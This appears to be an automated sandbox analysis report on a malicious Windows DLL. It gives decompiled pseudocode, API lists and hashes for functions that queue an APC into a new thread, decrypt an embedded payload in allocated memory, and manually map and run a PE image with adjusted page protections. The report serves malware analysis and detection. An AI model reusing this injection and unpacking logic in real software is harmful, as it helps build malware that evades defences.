							L6:
							_v8 = 0;
						} else {
							 *0x6ddc4130 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6DDC155C(E6DDC15EA, E6DDC1A86(_a12, 1, 0x6ddc4118, _t41));
							 *0x6ddc410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x6ddc1d4e
0x6ddc1d5a
0x6ddc1d5c
0x6ddc1d5f
0x6ddc1dd5
0x6ddc1ddb
0x6ddc1ddd
0x6ddc1ddf
0x6ddc1de5
0x6ddc1de7
0x6ddc1dec
0x6ddc1def
0x6ddc1dfa
0x6ddc1dfc
0x00000000
0x00000000
0x6ddc1dfe
0x6ddc1e01
0x6ddc1e03
0x00000000
0x00000000
0x00000000
0x6ddc1e03
0x6ddc1e0b
0x6ddc1e0b
0x6ddc1e17
0x6ddc1e17
0x6ddc1d61
0x6ddc1d62
0x6ddc1d82
0x6ddc1d88
0x6ddc1d8d
0x6ddc1d8f
0x6ddc1dcb
0x6ddc1dcb
0x6ddc1d91
0x6ddc1d99
0x6ddc1da0
0x6ddc1daa
0x6ddc1db6
0x6ddc1dbb
0x6ddc1dc2
0x6ddc1dc7
0x00000000
0x6ddc1dc7
0x6ddc1dc2
0x6ddc1d8f
0x6ddc1d62
0x6ddc1e24

APIs

InterlockedIncrement.KERNEL32(6DDC4108), ref: 6DDC1D6D
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6DDC1D82

Part of subcall function 6DDC155C: CreateThread.KERNELBASE ref: 6DDC1573
Part of subcall function 6DDC155C: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6DDC1588
Part of subcall function 6DDC155C: GetLastError.KERNEL32(00000000), ref: 6DDC1593
Part of subcall function 6DDC155C: TerminateThread.KERNEL32(00000000,00000000), ref: 6DDC159D
Part of subcall function 6DDC155C: CloseHandle.KERNEL32(00000000), ref: 6DDC15A4
Part of subcall function 6DDC155C: SetLastError.KERNEL32(00000000), ref: 6DDC15AD

InterlockedDecrement.KERNEL32(6DDC4108), ref: 6DDC1DD5
SleepEx.KERNEL32(00000064,00000001), ref: 6DDC1DEF
CloseHandle.KERNEL32 ref: 6DDC1E0B
HeapDestroy.KERNEL32 ref: 6DDC1E17

Memory Dump Source

Source File: 00000000.00000002.498510777.000000006DDC1000.00000020.00020000.sdmp, Offset: 6DDC0000, based on PE: true

Associated: 00000000.00000002.498499032.000000006DDC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498533432.000000006DDC3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498556653.000000006DDC5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.498571531.000000006DDC6000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 5fc9c9a6d1b63e049147a91e60e4057419b9cb2e34addc3f050d536f7576998b
Instruction ID: 96c6ffd5c159c9bf3c994a70480f18821fb479ec68ceb0e9065432abd9fc0dbb
Opcode Fuzzy Hash: 5fc9c9a6d1b63e049147a91e60e4057419b9cb2e34addc3f050d536f7576998b
Instruction Fuzzy Hash: B2219372A00217EFEF00BFA9CC88A697BBCFB5A360F114529F555D3142E73499049F62

Uniqueness

Uniqueness Score: -1.00%

Function 6DDC155C, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DDC155C(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6ddc4140, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6ddc1573
0x6ddc1579
0x6ddc157d
0x6ddc1588
0x6ddc1590
0x6ddc1599
0x6ddc159d
0x6ddc15a4
0x6ddc15ab
0x6ddc15ad
0x6ddc15b3
0x6ddc1590
0x6ddc15b7

APIs

CreateThread.KERNELBASE ref: 6DDC1573
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6DDC1588
GetLastError.KERNEL32(00000000), ref: 6DDC1593
TerminateThread.KERNEL32(00000000,00000000), ref: 6DDC159D
CloseHandle.KERNEL32(00000000), ref: 6DDC15A4
SetLastError.KERNEL32(00000000), ref: 6DDC15AD

Memory Dump Source

Source File: 00000000.00000002.498510777.000000006DDC1000.00000020.00020000.sdmp, Offset: 6DDC0000, based on PE: true

Associated: 00000000.00000002.498499032.000000006DDC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498533432.000000006DDC3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498556653.000000006DDC5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.498571531.000000006DDC6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: e96f687700dfba4352bec03b1fe240e4dfe5433bac52ea58104d8f2497c4996f
Instruction ID: 068d4431dae68db3ac11a104e6228038d7dde4badf6c40d34201f1c466ccb618
Opcode Fuzzy Hash: e96f687700dfba4352bec03b1fe240e4dfe5433bac52ea58104d8f2497c4996f
Instruction Fuzzy Hash: 4CF01C33285622FBEB227FA19C08F9FBF7DFB0A751F014504FA1691150C7318911ABA6

Uniqueness

Uniqueness Score: -1.00%

Function 6DEBABF7, Relevance: 6.3, APIs: 4, Instructions: 308COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.498854075.000000006DEBA000.00000080.00020000.sdmp, Offset: 6DEBA000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f9f05cced49a410454feb61cc98ea02fa031f02da62c209ac48c6104900344a
Instruction ID: 572a2d0407a18c47a1758c010eb979684120f7e5d74ced1b91b9afc5916e3402
Opcode Fuzzy Hash: 1f9f05cced49a410454feb61cc98ea02fa031f02da62c209ac48c6104900344a
Instruction Fuzzy Hash: ACA17CB25D93935FCB118A78CE84AA57BA0EF033297380669C5E0DB392EFF46406C751

Uniqueness

Uniqueness Score: -1.00%

Function 6DDC1717, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E6DDC1717(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				unsigned int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed char _v44;
				void* _v48;
				signed int _v56;
				signed int _v60;
				intOrPtr _t50;
				void* _t57;
				void* _t61;
				signed int _t67;
				signed char _t69;
				signed char _t70;
				void* _t76;
				intOrPtr _t77;
				unsigned int _t82;
				intOrPtr _t86;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				signed int _t93;

				_t90 =  *0x6ddc4130;
				_t50 = E6DDC193C(_t90,  &_v28,  &_v20);
				_v24 = _t50;
				if(_t50 == 0) {
					asm("sbb ebx, ebx");
					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
					_t91 = _t90 + _v28;
					_v48 = _t91;
					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
					_t76 = _t57;
					_v36 = _t76;
					if(_t76 == 0) {
						_v24 = 8;
					} else {
						_t69 = 0;
						if(_t67 <= 0) {
							_t77 =  *0x6ddc4140;
						} else {
							_t86 = _a4;
							_v8 = _t91;
							_v8 = _v8 - _t76;
							_t14 = _t86 + 0x6ddc51a7; // 0x3220a9c2
							_t61 = _t57 - _t91 + _t14;
							_v16 = _t76;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t70 = _t69 + 1;
								_v44 = _t70;
								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
								if(_t82 != 0) {
									_v32 = _v32 & 0x00000000;
									_t89 = _v16;
									_v12 = 0x400;
									do {
										_t93 =  *((intOrPtr*)(_v8 + _t89));
										_v40 = _t93;
										if(_t93 == 0) {
											_v12 = 1;
										} else {
											 *_t89 = _t93 + _v32 - _t82;
											_v32 = _v40;
											_t89 = _t89 + 4;
										}
										_t33 =  &_v12;
										 *_t33 = _v12 - 1;
									} while ( *_t33 != 0);
								}
								_t69 = _v44;
								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
								_v16 = _v16 + 0x1000;
								 *0x6ddc4140 = _t77;
							} while (_t69 < _t67);
						}
						if(_t77 != 0x63699bc3) {
							_v24 = 0xc;
						} else {
							memcpy(_v48, _v36, _v20);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v24;
			}

0x6ddc171e
0x6ddc172e
0x6ddc1733
0x6ddc1738
0x6ddc174d
0x6ddc1754
0x6ddc1759
0x6ddc176a
0x6ddc176d
0x6ddc1773
0x6ddc1775
0x6ddc177a
0x6ddc1856
0x6ddc1780
0x6ddc1780
0x6ddc1784
0x6ddc181c
0x6ddc178a
0x6ddc178b
0x6ddc1790
0x6ddc1793
0x6ddc1796
0x6ddc1796
0x6ddc179d
0x6ddc17a0
0x6ddc17a8
0x6ddc17a9
0x6ddc17aa
0x6ddc17b1
0x6ddc17b5
0x6ddc17bb
0x6ddc17bf
0x6ddc17c1
0x6ddc17c5
0x6ddc17c8
0x6ddc17cf
0x6ddc17d2
0x6ddc17d5
0x6ddc17da
0x6ddc17f0
0x6ddc17dc
0x6ddc17e6
0x6ddc17e8
0x6ddc17eb
0x6ddc17eb
0x6ddc17f7
0x6ddc17f7
0x6ddc17f7
0x6ddc17cf
0x6ddc1802
0x6ddc1805
0x6ddc1808
0x6ddc180f
0x6ddc1815
0x6ddc1819
0x6ddc1828
0x6ddc183d
0x6ddc182a
0x6ddc1833
0x6ddc1838
0x6ddc184e
0x6ddc184e
0x6ddc185d
0x6ddc1863

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6DDC176D
memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6DDC1833
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 6DDC184E

Strings

Jun 9 2021, xrefs: 6DDC17A0

Memory Dump Source

Source File: 00000000.00000002.498510777.000000006DDC1000.00000020.00020000.sdmp, Offset: 6DDC0000, based on PE: true

Associated: 00000000.00000002.498499032.000000006DDC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498533432.000000006DDC3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498556653.000000006DDC5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.498571531.000000006DDC6000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Jun 9 2021
API String ID: 4010158826-3443083063
Opcode ID: 75fe0ad3748d16947dd3f850489455119feac3db496166be820b5344986f6e88
Instruction ID: 21075ee63d3f4f87d303ab4f4b4e3b4936c3c7d4244978317f7c855f98f0bd02
Opcode Fuzzy Hash: 75fe0ad3748d16947dd3f850489455119feac3db496166be820b5344986f6e88
Instruction Fuzzy Hash: 2A413B75E4022AEFDF01DF98C880AEEBBBABF49314F248129E91077245C775A905CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6DDC15EA, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6DDC15EA(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6DDC1456(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6ddc15f3
0x6ddc15f8
0x6ddc1606
0x6ddc160b
0x6ddc160b
0x6ddc1611
0x6ddc1616
0x6ddc161a
0x6ddc161e
0x6ddc161e
0x6ddc1628
0x6ddc1631

APIs

GetCurrentThread.KERNEL32 ref: 6DDC15ED
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6DDC15F8
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6DDC160B
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6DDC161E

Memory Dump Source

Source File: 00000000.00000002.498510777.000000006DDC1000.00000020.00020000.sdmp, Offset: 6DDC0000, based on PE: true

Associated: 00000000.00000002.498499032.000000006DDC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498533432.000000006DDC3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498556653.000000006DDC5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.498571531.000000006DDC6000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: a6d7b1ddccbb5f3e6f5060f945457e97072bcd8a0ec945cfdc9bdb6743d029c7
Instruction ID: 7aeac89bc62f85d7792499d1710d50c70052a64affe11005769e1b0c6c170c6a
Opcode Fuzzy Hash: a6d7b1ddccbb5f3e6f5060f945457e97072bcd8a0ec945cfdc9bdb6743d029c7
Instruction Fuzzy Hash: 00E09B3124A6225BB6123F294C44F6B676CDF86371F014335F520D32D0DB50CC0195BA

Uniqueness

Uniqueness Score: -1.00%

Function 6DDC1020, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6DDC1020(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6ddc4140;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}

0x6ddc102a
0x6ddc1037
0x6ddc103d
0x6ddc1049
0x6ddc1059
0x6ddc105b
0x6ddc1063
0x6ddc10f8
0x6ddc10ff
0x00000000
0x00000000
0x00000000
0x6ddc1069
0x6ddc1069
0x6ddc1069
0x6ddc106d
0x00000000
0x00000000
0x6ddc1079
0x6ddc107d
0x6ddc10a1
0x6ddc10a5
0x6ddc10b9
0x6ddc10b9
0x6ddc10bf
0x6ddc10ce
0x6ddc10d2
0x6ddc10da
0x6ddc10da
0x6ddc10e2
0x6ddc10e5
0x6ddc10f2
0x00000000
0x00000000
0x00000000
0x00000000
0x6ddc10f2
0x6ddc10ad
0x6ddc10b1
0x6ddc10b7
0x00000000
0x00000000
0x00000000
0x6ddc10b7
0x6ddc1085
0x6ddc1089
0x6ddc1093
0x6ddc108b
0x6ddc108b
0x6ddc108b
0x00000000
0x6ddc1089
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6DDC1059
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6DDC10CE
GetLastError.KERNEL32 ref: 6DDC10D4

Memory Dump Source

Source File: 00000000.00000002.498510777.000000006DDC1000.00000020.00020000.sdmp, Offset: 6DDC0000, based on PE: true

Associated: 00000000.00000002.498499032.000000006DDC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498533432.000000006DDC3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498556653.000000006DDC5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.498571531.000000006DDC6000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 825828b6b6be5e15b1a61c29bb40ca573bbfe8a0dd3707a36db51a5788d73cfa
Instruction ID: 156d66bb519f3bae51059916a32d4e8182c0acb6ed07306b53f9c084c6521e61
Opcode Fuzzy Hash: 825828b6b6be5e15b1a61c29bb40ca573bbfe8a0dd3707a36db51a5788d73cfa
Instruction Fuzzy Hash: CA217171800217DFCB14EF95C481AEAF7F9FF08319F00495AE00297441E378A659DB52

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEA52E, Relevance: 4.5, APIs: 3, Instructions: 28COMMON

Download Yara Rule

APIs

std::ios_base::_Init.LIBCPMT ref: 6DDEA534

Part of subcall function 6DDEA074: std::ios_base::clear.LIBCPMTD ref: 6DDEA0A3
Part of subcall function 6DDEA074: std::locale::_Init.LIBCPMT ref: 6DDEA0B8

Part of subcall function 6DDEAC30: __EH_prolog3.LIBCMT ref: 6DDEAC37
Part of subcall function 6DDEAC30: std::ios_base::getloc.LIBCPMTD ref: 6DDEAC40

std::ios_base::clear.LIBCPMTD ref: 6DDEA561
std::ios_base::_Addstd.LIBCPMT ref: 6DDEA56D

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: Initstd::ios_base::_std::ios_base::clear$AddstdH_prolog3std::ios_base::getlocstd::locale::_
String ID:
API String ID: 3327797918-0
Opcode ID: 75a706e45bd50f0c9afe3102ab609f860f4f84a39c4ba575d6882af7320c9f9c
Instruction ID: 21f35667c4b2f7976ce987783d821a7f6058fbd65e276717303a1a80f1336ef1
Opcode Fuzzy Hash: 75a706e45bd50f0c9afe3102ab609f860f4f84a39c4ba575d6882af7320c9f9c
Instruction Fuzzy Hash: 9FF0A031608355A7DB20AB60D440F5A77E8AF006B8F01A40AF68257A81D775F54087A4

Uniqueness

Uniqueness Score: -1.00%

Function 6DDC1E55, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DDC1E55() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x6ddc4144;
				if( *0x6ddc412c > 5) {
					_t16 = _t15 + 0x6ddc50f9;
				} else {
					_t16 = _t15 + 0x6ddc50b1;
				}
				E6DDC16F1(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E6DDC132A( &_v32,  &_v16,  *0x6ddc4140 ^ 0xfd7cd1cf) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x6ddc4138);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E6DDC1ADA(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x6ddc4138 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E6DDC2033(_t44, _t32 + 4);
						}
					}
					_t25 = E6DDC1634(_v28); // executed
				}
				ExitThread(_t25);
			}

0x6ddc1e5b
0x6ddc1e6c
0x6ddc1e76
0x6ddc1e6e
0x6ddc1e6e
0x6ddc1e6e
0x6ddc1e7d
0x6ddc1e86
0x6ddc1e8b
0x6ddc1ea9
0x6ddc1f05
0x6ddc1eab
0x6ddc1eb1
0x6ddc1eb7
0x6ddc1ec5
0x6ddc1ec9
0x6ddc1ed0
0x6ddc1ed9
0x6ddc1edd
0x6ddc1ee3
0x6ddc1ef4
0x6ddc1ee5
0x6ddc1eeb
0x6ddc1eeb
0x6ddc1ee3
0x6ddc1efc
0x6ddc1efc
0x6ddc1f07

APIs

lstrlenW.KERNEL32(?), ref: 6DDC1EB1
ExitThread.KERNEL32 ref: 6DDC1F07

Memory Dump Source

Source File: 00000000.00000002.498510777.000000006DDC1000.00000020.00020000.sdmp, Offset: 6DDC0000, based on PE: true

Associated: 00000000.00000002.498499032.000000006DDC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498533432.000000006DDC3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498556653.000000006DDC5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.498571531.000000006DDC6000.00000002.00020000.sdmp Download File

Similarity

API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: d2bdb90201f7d3e0e260e7e7238bbc13eb48a963a04b761e2980ff3a7bec8d5c
Instruction ID: 8606a956a8b9f8b850fc8a4fd153db0f03aec582b772ae62cddf9faa811a8d8a
Opcode Fuzzy Hash: d2bdb90201f7d3e0e260e7e7238bbc13eb48a963a04b761e2980ff3a7bec8d5c
Instruction Fuzzy Hash: 6E116D725086179FEB11FBA4C848F9B77FCAB19344F024916F591D7151EB30E5058BA3

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEAC30, Relevance: 3.0, APIs: 2, Instructions: 20COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDEAC37
std::ios_base::getloc.LIBCPMTD ref: 6DDEAC40

Part of subcall function 6DDE88A0: std::locale::locale.LIBCPMTD ref: 6DDE88BA

Part of subcall function 6DDE3020: std::_Lockit::_Lockit.LIBCPMT ref: 6DDE304A
Part of subcall function 6DDE3020: int.LIBCPMTD ref: 6DDE3063

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: H_prolog3LockitLockit::_std::_std::ios_base::getlocstd::locale::locale
String ID:
API String ID: 2499403736-0
Opcode ID: 5c2e3c01f9b5aa86cef6116ec7cdcbb418d280e044eac7929e9f433f60bb00ca
Instruction ID: 5135a5d991eda5117627d9526c9269f115df8160320fc1e02a97553d84a49c46
Opcode Fuzzy Hash: 5c2e3c01f9b5aa86cef6116ec7cdcbb418d280e044eac7929e9f433f60bb00ca
Instruction Fuzzy Hash: EFE04F719042059BCB14FBB4CC08AAEBB74BF947A5F214564B751571D4CF348A00C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDF2A8A, Relevance: 3.0, APIs: 2, Instructions: 16COMMON

Download Yara Rule

APIs

GetUserDefaultLCID.KERNEL32(00000055,?,?,6DDFE723,?,00000055,0000009C), ref: 6DDF2AA4
___crtDownlevelLCIDToLocaleName.LIBCMT ref: 6DDF2AAB

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: DefaultDownlevelLocaleNameUser___crt
String ID:
API String ID: 395733334-0
Opcode ID: 3ac6d5bc5e1b118b1e8e2fe06995786d7f0cfd7e84e9a580b21b37c0b6362049
Instruction ID: 92fd25989e16957fb5a7ad120d454dbb636af32a7b5fbe4d08d0af759428a762
Opcode Fuzzy Hash: 3ac6d5bc5e1b118b1e8e2fe06995786d7f0cfd7e84e9a580b21b37c0b6362049
Instruction Fuzzy Hash: 70D09E72404109AFCF116BE4AC0592A3BA8AF5D6147454405F51C85511D736A164DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6DDC16F1, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6DDC16F1(void* __eax, intOrPtr _a4) {

				 *0x6ddc4150 =  *0x6ddc4150 & 0x00000000;
				_push(0);
				_push(0x6ddc414c);
				_push(1);
				_push(_a4);
				 *0x6ddc4148 = 0xc; // executed
				L6DDC1A3E(); // executed
				return __eax;
			}

0x6ddc16f1
0x6ddc16f8
0x6ddc16fa
0x6ddc16ff
0x6ddc1701
0x6ddc1705
0x6ddc170f
0x6ddc1714

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(6DDC1E82,00000001,6DDC414C,00000000), ref: 6DDC170F

Memory Dump Source

Source File: 00000000.00000002.498510777.000000006DDC1000.00000020.00020000.sdmp, Offset: 6DDC0000, based on PE: true

Associated: 00000000.00000002.498499032.000000006DDC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498533432.000000006DDC3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498556653.000000006DDC5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.498571531.000000006DDC6000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 86db7e99530d6672c9848ec93e95c00af473e104dd85fc55d51238aae251451c
Instruction ID: 9c8d57431768784abcfe4eb4b1dfcdc067c66bc41e68546465f0da8ff6b28bf3
Opcode Fuzzy Hash: 86db7e99530d6672c9848ec93e95c00af473e104dd85fc55d51238aae251451c
Instruction Fuzzy Hash: C0C04C75144341AAFA20BF408C45F557A797769705F515504B294661C583B560588526

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1E283, Relevance: 1.4, APIs: 1, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,000008D2,00003000,00000040,000008D2,6DE1DD28), ref: 6DE1E395

Memory Dump Source

Source File: 00000000.00000002.498763329.000000006DE1B000.00000040.00020000.sdmp, Offset: 6DE1B000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 90650e3c6c7673b7d2fcf8755899109705f0d26dd55bdfef729c9fccd514bc0c
Instruction ID: 9ea18e71ab9e6e71e7df9985d00391ae7adfbd7408206eeca678bfb2c84a1c5e
Opcode Fuzzy Hash: 90650e3c6c7673b7d2fcf8755899109705f0d26dd55bdfef729c9fccd514bc0c
Instruction Fuzzy Hash: 4B41D03220E7818FC7139F248CA46A5BF70AF46704B1D04CAE895EF6A7DAA42805D732

Uniqueness

Uniqueness Score: -1.00%

Function 6DDC1634, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6DDC1634(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6ddc4140;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6ddc4140 - 0x63698bc4 &  !( *0x6ddc4140 - 0x63698bc4);
				_t18 = E6DDC1146( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6ddc4140 - 0x63698bc4 &  !( *0x6ddc4140 - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6ddc4140 - 0x63698bc4 &  !( *0x6ddc4140 - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6DDC1CBE(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E6DDC1BAC(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E6DDC1020(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6DDC201E(_t42);
					L8:
					return _t29;
				}
			}

0x6ddc163c
0x6ddc163e
0x6ddc165a
0x6ddc166b
0x6ddc1672
0x6ddc16d0
0x00000000
0x6ddc1674
0x6ddc1674
0x6ddc167e
0x6ddc1682
0x6ddc1687
0x6ddc168a
0x6ddc168f
0x6ddc1693
0x6ddc1698
0x6ddc169d
0x6ddc16a1
0x6ddc16a6
0x6ddc16a7
0x6ddc16ab
0x6ddc16b0
0x6ddc16b8
0x6ddc16b8
0x6ddc16b0
0x6ddc16a1
0x6ddc1693
0x6ddc16ba
0x6ddc16c3
0x6ddc16c7
0x6ddc16d1
0x6ddc16d7
0x6ddc16d7

APIs

Part of subcall function 6DDC1146: GetModuleHandleA.KERNEL32(?,00000020), ref: 6DDC116A
Part of subcall function 6DDC1146: GetProcAddress.KERNEL32(00000000,?), ref: 6DDC118C
